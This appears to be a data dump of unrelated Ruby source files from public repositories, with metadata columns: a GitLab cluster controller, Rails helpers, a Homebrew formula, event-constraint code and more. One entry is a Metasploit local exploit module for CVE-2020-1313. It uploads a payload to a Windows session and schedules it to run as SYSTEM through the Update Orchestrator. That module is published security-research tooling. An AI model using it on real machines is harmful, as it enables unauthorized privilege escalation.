def metric_prefix_unit
@metric_prefix ||= YAML.load_file(File.join(__dir__, 'unit/metric_prefix.yml'))
end
def si_alter_unit
@si_alter_unit ||= YAML.load_file(File.join(__dir__, 'unit/si_alter_unit.yml'))
end
def reg(kind_of_unit)
case kind_of_unit
when :ari
/(?:[\(\)\+\-\*\/])/
when :double
/(?:\^\(?[\+\-]?\d+\/?\d*\)?)/
when :num
/\d+(?:\.\d*)?(?:e[+-]?\d+)?/
when :tri
/(?:sin|cos|tan)\(.+\)/
else
hash_name = self.methods.grep(/.*#{kind_of_unit.to_s}.*(_unit)$/).first.to_s
unit_hash = if hash_name.include?("variable")
hash = {}
send(hash_name).values.each{|x| hash.merge!(x)}.flatten
hash
else
send hash_name
end
keys_or_values = hash_name.to_s.include?("si") ? :values : :keys
Regexp.new("#{unit_hash.send(keys_or_values).flatten.sort{|a,b| b.size <=> a.size}.map{|x| "|#{send_method(Regexp.escape(x), @opt)}"}.join}".gsub(/^\|/,""))
end
end
def unit_reg
/(#{reg(:derived)})|((?:#{reg(:metric)})?#{reg(:alter)})|(#{reg(:variable)})|((?:#{reg(:metric)})?(?:#{reg(:base)}|g){1}-*\d*)|(#{reg(:ari)})/
end
end
end
| 36.194767 | 225 | 0.546462 |
03019b0becc70f03b8ec9765b09094e5139c7c87 | 3,446 | class Projects::ClustersController < Projects::ApplicationController
before_action :cluster, except: [:login, :index, :new, :create]
before_action :authorize_read_cluster!
before_action :authorize_create_cluster!, only: [:new, :create]
before_action :authorize_google_api, only: [:new, :create]
before_action :authorize_update_cluster!, only: [:update]
before_action :authorize_admin_cluster!, only: [:destroy]
def index
if project.cluster
redirect_to project_cluster_path(project, project.cluster)
else
redirect_to new_project_cluster_path(project)
end
end
def login
begin
state = generate_session_key_redirect(namespace_project_clusters_url.to_s)
@authorize_url = GoogleApi::CloudPlatform::Client.new(
nil, callback_google_api_auth_url,
state: state).authorize_url
rescue GoogleApi::Auth::ConfigMissingError
# no-op
end
end
def new
@cluster = project.build_cluster
end
def create
@cluster = Ci::CreateClusterService
.new(project, current_user, create_params)
.execute(token_in_session)
if @cluster.persisted?
redirect_to project_cluster_path(project, @cluster)
else
render :new
end
end
def status
respond_to do |format|
format.json do
Gitlab::PollingInterval.set_header(response, interval: 10_000)
render json: ClusterSerializer
.new(project: @project, current_user: @current_user)
.represent_status(@cluster)
end
end
end
def show
end
def update
Ci::UpdateClusterService
.new(project, current_user, update_params)
.execute(cluster)
if cluster.valid?
flash[:notice] = "Cluster was successfully updated."
redirect_to project_cluster_path(project, project.cluster)
else
render :show
end
end
def destroy
if cluster.destroy
flash[:notice] = "Cluster integration was successfully removed."
redirect_to project_clusters_path(project), status: 302
else
flash[:notice] = "Cluster integration was not removed."
render :show
end
end
private
def cluster
@cluster ||= project.cluster.present(current_user: current_user)
end
def create_params
params.require(:cluster).permit(
:gcp_project_id,
:gcp_cluster_zone,
:gcp_cluster_name,
:gcp_cluster_size,
:gcp_machine_type,
:project_namespace,
:enabled)
end
def update_params
params.require(:cluster).permit(
:project_namespace,
:enabled)
end
def authorize_google_api
unless GoogleApi::CloudPlatform::Client.new(token_in_session, nil)
.validate_token(expires_at_in_session)
redirect_to action: 'login'
end
end
def token_in_session
@token_in_session ||=
session[GoogleApi::CloudPlatform::Client.session_key_for_token]
end
def expires_at_in_session
@expires_at_in_session ||=
session[GoogleApi::CloudPlatform::Client.session_key_for_expires_at]
end
def generate_session_key_redirect(uri)
GoogleApi::CloudPlatform::Client.new_session_key_for_redirect_uri do |key|
session[key] = uri
end
end
def authorize_update_cluster!
access_denied! unless can?(current_user, :update_cluster, cluster)
end
def authorize_admin_cluster!
access_denied! unless can?(current_user, :admin_cluster, cluster)
end
end
| 25.153285 | 81 | 0.701103 |
ed0c823f6b32a30048408a66c1ae29064440cb49 | 354 | # frozen_string_literal: true
require_relative "amqp_channel_binding_contract"
require_relative "amqp_operation_binding_contract"
require_relative "amqp_message_binding_contract"
module Multidapter
module Adapters
module Amqp
module Validators
class AmqpContract < Dry::Validation::Contract
end
end
end
end
end
| 19.666667 | 54 | 0.768362 |
bb5f246387aafb9c41d60fdca9f3d431a9fe7453 | 6,644 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Exploit::EXE
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Update Orchestrator unchecked ScheduleWork call',
'Description' => %q{
This exploit uses access to the UniversalOrchestrator ScheduleWork API call
which does not verify the caller's token before scheduling a job to be run
as SYSTEM. You cannot schedule something in a given time, so the payload will
execute as system sometime in the next 24 hours.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Imre Rad', # Original discovery? and PoC (https://github.com/irsl/CVE-2020-1313)
'bwatters-r7' # msf module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' =>
[
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2019-11-04',
'References' =>
[
['CVE', '2020-1313'],
['URL', 'https://github.com/irsl/CVE-2020-1313']
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => true
}
)
)
register_options([
OptString.new('EXPLOIT_NAME',
[false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
OptString.new('PAYLOAD_NAME',
[false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
OptString.new('WRITABLE_DIR',
[false, 'Path to write binaries (%TEMP% by default).', nil]),
OptInt.new('EXPLOIT_TIMEOUT',
[true, 'The number of seconds to wait for exploit to finish running', 60]),
OptInt.new('EXECUTE_DELAY',
[true, 'The number of seconds to delay between file upload and exploit launch', 3])
])
end
def exploit
exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
payload_path = "#{temp_path}\\#{payload_name}"
exploit_path = "#{temp_path}\\#{exploit_name}"
payload_exe = generate_payload_exe
# Check target
vprint_status('Checking Target')
validate_active_host
validate_target
fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)
# Upload Exploit
vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
ensure_clean_destination(exploit_path)
exploit_bin = exploit_data('cve-2020-1313', 'cve-2020-1313-exe.x64.exe')
write_file(exploit_path, exploit_bin)
print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")
# Upload Payload
vprint_status("Uploading Payload to #{sysinfo['Computer']} as #{exploit_path}")
ensure_clean_destination(payload_path)
write_file(payload_path, payload_exe)
print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
print_warning("This exploit requires manual cleanup of the payload #{payload_path}")
# Run Exploit
vprint_status('Running Exploit')
begin
output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
vprint_status("Exploit Output:\n#{output}")
rescue Rex::TimeoutError => e
elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e)
print_error('Caught timeout. Exploit may be taking longer or it may have failed.')
end
vprint_status("Cleaning up #{exploit_path}")
ensure_clean_destination(exploit_path)
# Check registry value
unless registry_key_exist?('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler')
fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!')
end
reg_keys = registry_enumkeys('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Orchestrator\UScheduler')
fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') if reg_keys.nil?
found_job = false
reg_keys.each do |key|
start_arg = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'startArg')
next unless start_arg['Data'].include? payload_name
found_job = true
queued_time = registry_getvalinfo("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Orchestrator\\UScheduler\\#{key}", 'queuedTime')
q_time_i = queued_time['Data'].unpack1('L_')
q_time_t = (q_time_i / 10000000) - 11644473600
print_good("Payload Scheduled for execution at #{Time.at(q_time_t)}")
end
fail_with(Module::Failure::Unknown, 'Failed to find registry scheduler data!') unless found_job
end
def validate_active_host
print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
rescue Rex::Post::Meterpreter::RequestError => e
elog('Could not connect to session', error: e)
raise Msf::Exploit::Failed, 'Could not connect to session'
end
def validate_target
if sysinfo['Architecture'] == ARCH_X86
fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
end
end
def check
sysinfo_value = sysinfo['OS']
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Build Number = #{build_num}")
if sysinfo_value =~ /10/ && (17763 < build_num) && (build_num <= 19041)
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def ensure_clean_destination(path)
return unless file?(path)
print_status("#{path} already exists on the target. Deleting...")
begin
file_rm(path)
print_status("Deleted #{path}")
rescue Rex::Post::Meterpreter::RequestError => e
elog(e)
print_error("Unable to delete #{path}")
end
end
end
| 40.266667 | 156 | 0.660747 |
b99af838a40ffa71e5bddd704499740c0bf60da8 | 1,594 | module ApplicationHelper
def theme_class
'lb-Theme--blue'
end
def main_class
"lb-Main--#{controller_name}"
end
def doc_link(slug, options = {})
name = doc_name(slug)
name << options.delete(:link_suffix).to_s
dopts = options.except(:class)
lopts = options.slice(:class)
link_to name, doc_lpath(slug, dopts), lopts
end
def doc_name(slug)
case slug
when :anatomy then "Lamby's Anatomy"
when :installing_aws_sam then 'Installing AWS SAM'
when :asset_host_and_precompiling then 'Precompiling CSS & JavaScript Assets'
when :environment_and_configuration then 'Environment & Configuration'
when :bin_scripts_build_and_deploy then 'Build & Deploy'
when :custom_domain_names then 'Custom Domain Names, CloudFront, & SSL'
when :api_gateway_and_cloudwatch_logs then 'API Gateway & CloudWatch Logs'
when :activejob_and_lambda then 'ActiveJob & Lambda'
when :logging_metrics_observability then 'Logging, Metrics, & Observability'
when :database_options then 'Database & VPCs'
when :cold_starts then 'Cold Starts'
when :running_tasks then 'Running Tasks'
else slug.to_s.titleize
end
end
def doc_lpath(slug, options = {})
doc_path options.merge(id: slug)
end
def doc_next(slug)
content_tag :div, class: 'lb-Page-nav' do
doc_link slug, link_suffix: ' →', class: 'lb-Button lb-Button-fullResponsive mui-btn mui-btn--large mui-btn--danger mui-btn--raised'
end
end
def disqus
render partial: 'disqus' if disqus?
end
def disqus?
Rails.env.production?
end
end
| 28.464286 | 138 | 0.710163 |
bb9a5b378d678f2cc107f8919e8284423972fdaa | 592 | require "json"
package = JSON.parse(File.read(File.join(__dir__, "package.json")))
Pod::Spec.new do |s|
s.name = "dianvo-native-android-xupdate"
s.version = package["version"]
s.summary = package["description"]
s.homepage = package["homepage"]
s.license = package["license"]
s.authors = package["author"]
s.platforms = { :ios => "10.0" }
s.source = { :git => "https://github.com/DeepRolling/react-native-android-xupdate.git", :tag => "#{s.version}" }
s.source_files = "ios/**/*.{h,m,mm,swift}"
s.dependency "React-Core"
end
| 26.909091 | 120 | 0.60473 |
6af1f9039cbd8ac8eea5d5c92d476c859bd4cf52 | 884 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
Bundler.require(*Rails.groups)
require "payola_spy"
module Dummy
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
end
end
| 36.833333 | 99 | 0.719457 |
ab03225a2dd241480cad933196e506f2a654fd62 | 283 | # Don't forget! This file needs to be 'required' in its spec file
# See README.md for instructions on how to do this
def fizzbuzz(int)
if int % 3 == 0 && int % 5 == 0
"FizzBuzz"
elsif int % 5 == 0
"Buzz"
elsif int % 3 == 0
"Fizz"
else int
puts "FizzBuzz"
end
end | 20.214286 | 65 | 0.614841 |
21d2d02fdf7bfd81da18880f9fa7f1e64400099a | 20,958 | # Define Infinity
if !defined? Infinity
Infinity = 1.0/0
end
module Roby
class Plan
# An EventStructure::EventDeadlines instance that is used by the
# TemporalConstraints relation to maintain the set of event deadlines
attribute(:emission_deadlines) { EventStructure::EventDeadlines.new }
end
module EventStructure
# Class used to maintain the event deadlines
class EventDeadlines
attr_reader :deadlines
def initialize
@deadlines = Array.new
end
# Adds a deadline to the set
def add(deadline, event, generator)
deadlines << [deadline, event, generator]
@deadlines = deadlines.sort_by(&:first)
end
# Remove the first deadline registered for +generator+
def remove_deadline_for(generator, time)
found = false
deadlines.delete_if do |deadline, _, gen|
if found
false
else
found = (deadline > time && generator == gen)
end
end
found
end
# Returns the number of queued deadlines
def size
@deadlines.size
end
# Returns the set of deadlines that have been missed at
# +current_time+. These deadlines get removed from the set.
def missed_deadlines(current_time)
result = []
while !deadlines.empty? && deadlines.first[0] < current_time
result << deadlines.shift
end
result
end
end
# Exception class used when an event has missed its deadline
class MissedDeadlineError < LocalizedError
# The event from which we deduced the deadline
attr_reader :constraining_event
# The time before which the failed generator should have emitted
attr_reader :deadline
def initialize(generator, constraining_event, deadline)
super(generator)
@constraining_event = constraining_event
@deadline = deadline
end
def pretty_print(pp)
pp.text "#{failed_generator} missed the deadline of #{deadline}"
pp.breakable
pp.text " required after the emission of #{constraining_event}"
end
end
# Exception raised when an event gets emitted outside its specified
# temporal constraints
class TemporalConstraintViolation < LocalizedError
attr_reader :parent_generator
attr_reader :allowed_intervals
def initialize(event, parent_generator, allowed_intervals)
super(event)
@parent_generator = parent_generator
@allowed_intervals = allowed_intervals.dup
end
def pretty_print(pp)
pp.text "Got "
failed_event.pretty_print(pp)
pp.text "It breaks the temporal constraint(s) #{allowed_intervals.map { |min, max| "[#{min}, #{max}]" }.join(" | ")} from"
pp.nest(2) do
pp.breakable
parent_generator.pretty_print(pp)
end
end
end
# Exception raised when an event gets emitted outside its specified
# temporal constraints
class OccurenceConstraintViolation < LocalizedError
attr_reader :parent_generator
attr_reader :count
attr_reader :allowed_interval
attr_reader :since
def initialize(event, parent_generator, count, allowed_interval, since)
super(event)
@parent_generator = parent_generator
@count = count
@allowed_interval = allowed_interval
@since = since
end
def pretty_print(pp)
pp.text "Got "
failed_event.pretty_print(pp)
pp.breakable
pp.text "This does not satisfy the occurance constraint [#{allowed_interval[0]}, #{allowed_interval[1]}] from"
pp.nest(2) do
pp.breakable
parent_generator.pretty_print(pp)
end
pp.breakable
pp.text "which has been emitted #{count} times"
if since
pp.text " since #{since}"
end
end
end
# A representation of a set of disjoint intervals, sorted in increasing
# order
class DisjointIntervalSet
# A list of intervals as [min, max]. The list is sorted in increasing order
attr_reader :intervals
def initialize
@intervals = Array.new
end
# Returns true if +value+ is included in one of the intervals
def include?(value)
candidate = intervals.
find { |min, max| max >= value }
candidate && (candidate[0] <= value)
end
# Returns the lower and upper bound of the union of all intervals
def boundaries
[intervals.first[0], intervals.last[1]]
end
# Adds a new interval to the set, merging it with existing intervals
# if needed
#
# Returns +self+
def add(min, max)
if intervals.empty?
intervals << [min, max]
return
end
new_list = Array.new
while interval = intervals.shift
if interval[1] < min
new_list << interval
elsif interval[0] > min
if interval[0] > max
new_list << [min, max] << interval
break
else
new_list << [min, [max, interval[1]].max]
end
break
else
new_list << [interval[0], [max, interval[1]].max]
break
end
end
if intervals.empty? && new_list.last[1] < min
new_list << [min, max]
elsif new_list.last[1] <= max
while interval = intervals.shift
last_interval = new_list.last
# It is guaranteed that interval[0] > last_interval[0].
# We therefore only need to check if interval[0] is
# included in last_interval
if interval[0] <= last_interval[1]
if last_interval[1] < interval[1]
last_interval[1] = interval[1]
break
end
else
new_list << interval
break
end
end
end
# We now know that the last interval in new_list has an upper
# bound that comes from an already existing interval. We are
# therefore sure that there are no overlaps.
new_list.concat(intervals)
@intervals = new_list
self
end
end
class TemporalConstraintSet < DisjointIntervalSet
attr_reader :occurence_constraints
def initialize
super
@occurence_constraints = {
true => [0, Infinity],
false => [0, Infinity] }
end
def add_occurence_constraint(min, max, recurrent)
existing = occurence_constraints[!!recurrent]
if existing[0] < min
existing[0] = min
end
if existing[1] > max
existing[1] = max
end
end
end
# This relation maintains a network of temporal constraints between
# events, that apply on the scheduling of these events
#
# If the a -> b edge exists in this graph, it specifies that
# \c b can be scheduled if and only if \c a can be scheduled *regardless
# of the existing temporal constraints that are due to \c b.
#
# As an example, let's set up a graph in which
# * a task ta will be started after a task tb has started *but*
# * all temporal constraints that apply on ta also apply on tb.
#
# The required edges are
#
# tb.success -> ta.start t=[0, Infinity], o=[1, Infinity] in TemporalConstraints
# ta.start -> tb.start in SchedulingConstraints
#
# The relation code takes care of maintaining the symmetric relationship
relation :SchedulingConstraints,
:child_name => :forward_scheduling_constraint,
:parent_name => :backward_scheduling_constraint,
:dag => false,
:noinfo => true do
def schedule_as(event)
event.add_forward_scheduling_constraint(self)
end
# True if this event is constrained by the TemporalConstraints
# relation in any way
def has_scheduling_constraints?
return true if has_temporal_constraints?
each_backward_scheduling_constraint do |parent|
return true
end
false
end
end
# Module that implements shortcuts on tasks to use the scheduling
# constraints
module TaskSchedulingConstraints
# Adds a constraint that ensures that the start event of +self+ is
# scheduled as the start event of +task+
def schedule_as(task)
start_event.schedule_as(task.start_event)
end
end
Roby::Task.include TaskSchedulingConstraints
# This relation maintains a network of temporal constraints between
# events.
#
# A relation A => B [min, max] specifies that, once the event A is
# emitted, the event B should be emitted within a [min, max] amount of
# time. Obviously, it is guaranteed that min > 0 and max > min
#
# The relation code takes care of maintaining the symmetric relationship
relation :TemporalConstraints,
:child_name => :forward_temporal_constraint,
:parent_name => :backward_temporal_constraint,
:dag => false do
# Shortcut to specify that +self+ should be emitted after
# +other_event+
def should_emit_after(other_event, options = nil)
if options
options = Kernel.validate_options options,
:min_t => nil, :max_t => nil, :recurrent => false
recurrent = options[:recurrent]
end
other_event.add_occurence_constraint(self, 1, Infinity, recurrent)
if options && (options[:min_t] || options[:max_t])
other_event.add_temporal_constraint(self,
options[:min_t] || 0, options[:max_t] || Infinity)
end
end
# True if this event is constrained by the TemporalConstraints
# relation in any way
def has_temporal_constraints?
each_backward_temporal_constraint do |parent|
return true
end
false
end
# Returns a [parent, intervals] pair that represents a temporal
# constraint the given time fails to meet
def find_failed_temporal_constraint(time)
each_backward_temporal_constraint do |parent|
if block_given?
next if !yield(parent)
end
disjoint_set = parent[self, TemporalConstraints]
next if disjoint_set.intervals.empty?
if disjoint_set.boundaries[0] < 0
# It might be fullfilled in the future
next
end
max_diff = disjoint_set.boundaries[1]
parent.history.each do |parent_event|
diff = time - parent_event.time
if diff > max_diff || !disjoint_set.include?(diff)
return parent, disjoint_set
end
disjoint_set.include?(diff)
end
end
nil
end
# Returns true if this event meets its temporal constraints
def meets_temporal_constraints?(time, &block)
!find_failed_temporal_constraint(time, &block) &&
!find_failed_occurence_constraint(true, &block)
end
# Creates a temporal constraint between +self+ and +other_event+.
# +min+ is the minimum time
def add_temporal_constraint(other_event, min, max)
if min > max
raise ArgumentError, "min should be lower than max (min == #{min} and max == #{max})"
end
if max < 0
return other_event.add_temporal_constraint(self, -max, -min)
elsif min < 0
set = TemporalConstraintSet.new
set.add(-max, -min)
other_event.add_forward_temporal_constraint(self, set)
end
set = TemporalConstraintSet.new
set.add(min, max)
add_forward_temporal_constraint(other_event, set)
set
end
# Adds a constraint on the allowed emission of +other_event+ based
# on the existing emissions of +self+
#
# +min+ and +max+ specify the minimum (resp. maximum) of times
# +self+ should be emitted before +other_event+ has the right to be
# emitted.
#
# If +recurrent+ is true, then the min/max values are computed using
# the emissions of +self+ since the last emission of +other_event+.
# Otherwise, all emissions since the creation of +self+ are taken
# into account.
def add_occurence_constraint(other_event, min, max = Infinity, recurrent = false)
set = TemporalConstraintSet.new
set.add_occurence_constraint(min, max, recurrent)
add_forward_temporal_constraint(other_event, set)
end
def find_failed_occurence_constraint(next_event)
base_event = if next_event then last
else history[-2]
end
if base_event
base_time = base_event.time
end
each_backward_temporal_constraint do |parent|
if block_given?
next if !yield(parent)
end
constraints = parent[self, TemporalConstraints]
counts = { false => parent.history.size }
if base_time
negative_count = parent.history.inject(0) do |count, ev|
break(count) if ev.time > base_time
count + 1
end
else
negative_count = 0
end
counts[true] = counts[false] - negative_count
counts.each do |recurrent, count|
min_count, max_count = constraints.occurence_constraints[recurrent]
if count < min_count || count > max_count
if recurrent && base_time
return [parent, parent.history.size, [min_count, max_count], base_time]
else
return [parent, parent.history.size, [min_count, max_count]]
end
end
end
end
nil
end
# Overloaded to register deadlines that this event's emissions
# define
def fired(event)
super if defined? super
# Verify that the event matches any running constraint
parent, intervals = find_failed_temporal_constraint(event.time)
if parent
plan.engine.add_error TemporalConstraintViolation.new(event, parent, intervals.intervals)
end
parent, count, allowed_interval, since = find_failed_occurence_constraint(false)
if parent
plan.engine.add_error OccurenceConstraintViolation.new(event, parent, count, allowed_interval, since)
end
deadlines = plan.emission_deadlines
# Remove the deadline that this emission fullfills (if any)
deadlines.remove_deadline_for(self, event.time)
# Add new deadlines
each_forward_temporal_constraint do |target, disjoint_set|
next if disjoint_set.intervals.empty?
max_diff = disjoint_set.boundaries[1]
is_fullfilled = target.history.any? do |target_event|
diff = event.time - target_event.time
break if diff > max_diff
disjoint_set.include?(diff)
end
if !is_fullfilled
deadlines.add(event.time + disjoint_set.boundaries[1], event, target)
end
end
end
end
# Module defining shortcuts on tasks to use the temporal constraints
module TaskTemporalConstraints
# Ensures that this task is started after +task_or_event+ has
# finished (if it is a task) or +task_or_event+ is emitted (if it is
# an event)
def should_start_after(task_or_event)
case task_or_event
when Roby::Task
start_event.should_emit_after(task_or_event.stop_event)
when Roby::EventGenerator
start_event.should_emit_after(task_or_event)
else
raise ArgumentError, "expected a task or an event generator, got #{task_or_event} of class #{task_or_event.class}"
end
end
end
Roby::Task.include TaskTemporalConstraints
# Returns the DisjointIntervalSet that represent the merge of the
# deadlines represented by +opt1+ and +opt2+
def TemporalConstraints.merge_info(parent, child, opt1, opt2)
result = TemporalConstraintSet.new
if opt1.intervals.size > opt2.intervals.size
result.intervals.concat(opt1.intervals)
for i in opt2.intervals
result.add(*i)
end
else
result.intervals.concat(opt2.intervals)
for i in opt1.intervals
result.add(*i)
end
end
result.occurence_constraints.merge!(opt1.occurence_constraints)
opt2.occurence_constraints.each do |recurrent, spec|
result.add_occurence_constraint(spec[0], spec[1], recurrent)
end
result
end
# Check the temporal constraint structure
#
# What it needs to do is check that events that *should* have been
# emitted had been. The emission of events outside of allowed intervals
# is already taken care of.
#
# Optimize by keeping the list of of maximum bounds at which an event
# should be emitted.
def TemporalConstraints.check_structure(plan)
deadlines = plan.emission_deadlines
# Now look for the timeouts
errors = []
deadlines.missed_deadlines(Time.now).
each do |deadline, event, generator|
errors << MissedDeadlineError.new(generator, event, deadline)
end
errors
end
end
end
| 39.394737 | 138 | 0.52047 |
26cad5cd3ed9651ad4003e123153f4a2d8013c82 | 48 | module CommentAttribute
VERSION = '0.1.3'
end
| 12 | 23 | 0.729167 |
ab92ae9310026d3a434f5aaa251a170258442674 | 65 | module Nurego
class APIConnectionError < NuregoError
end
end
| 13 | 40 | 0.8 |
9107981526d4f69b402f59bf55fe9737e6832740 | 349 | class CreateSpreePaymentCaptureEvents < ActiveRecord::Migration[4.2]
def change
create_table :spree_payment_capture_events do |t|
t.decimal :amount, precision: 10, scale: 2, default: 0.0
t.integer :payment_id
t.timestamps null: false, precision: 6
end
add_index :spree_payment_capture_events, :payment_id
end
end
| 26.846154 | 68 | 0.730659 |
5d0d430824a69fada01d846e2fde87f592259ed3 | 956 | require 'rails_helper'
RSpec.describe 'Expense creation', type: :system do
before :each do
User.delete_all
user1 = User.new(name: 'u_test', email: '[email protected]', password: 'konohavillage')
user1.save
user1.groups.create(name: 'expense test')
user1.groups.create(name: 'expense test 2')
end
it 'Can create expense' do
visit '/users/sign_in'
within('#new_user') do
fill_in 'Email', with: '[email protected]'
fill_in 'Password', with: 'konohavillage'
end
sleep(2)
click_button 'Log in'
sleep(3)
visit '/expenses/new'
sleep(5)
within '.form-inputs' do
fill_in 'expense_name', with: 'Test expense'
fill_in 'expense_amount', with: '100'
find(:css, '#expense_group_ids').find(:option, 'expense test').select_option
end
sleep(5)
click_button 'Create Expense'
expect(page).to have_content 'Expense was successfully created.'
sleep(5)
end
end
| 24.512821 | 89 | 0.656904 |
e9746f488a87b10a37c6e94ab64bc457e6cc5573 | 158 | class TaggingSerializer < ActiveModel::Serializer
attributes :id, :spark, :tag
def spark
object.spark.id
end
def tag
object.tag.id
end
end
| 14.363636 | 49 | 0.696203 |
6266d18ef7c6475fb3e7072640389359dd07ae5b | 1,324 | class OsgeoPoints2grid < Formula
desc "Generate digital elevation models using local griding"
homepage "https://github.com/CRREL/points2grid"
url "https://github.com/CRREL/points2grid/archive/1.3.1.tar.gz"
sha256 "6e2f2d3bbfd6f0f5c2d0c7d263cbd5453745a6fbe3113a3a2a630a997f4a1807"
bottle do
root_url "https://bottle.download.osgeo.org"
cellar :any
sha256 "40896708527e509a19c3c5d7d72b450f072ffac16d065ba9629498aa68225646" => :mojave
sha256 "40896708527e509a19c3c5d7d72b450f072ffac16d065ba9629498aa68225646" => :high_sierra
sha256 "84c8ebcfb7828a9e71b6970c701a6ae0dffeeb80584f24562b0f753cbb9268eb" => :sierra
end
# revision 1
head "https://github.com/CRREL/points2grid.git", :branch => "master"
depends_on "cmake" => :build
depends_on "boost"
depends_on "curl"
depends_on "osgeo-gdal"
def install
ENV.cxx11
args = std_cmake_args + %W[-DWITH_GDAL=ON -DWITH_TESTS=ON -DCMAKE_PREFIX_PATH=#{Formula["curl"].opt_prefix}]
libexec.install "test/data/example.las"
system "cmake", ".", *args
system "make", "install"
end
test do
system bin/"points2grid",
"-i", libexec/"example.las",
"-o", "example",
"--max", "--output_format", "grid"
assert_equal 13, File.read("example.max.grid").scan("423.820000").size
end
end
| 32.292683 | 112 | 0.716012 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.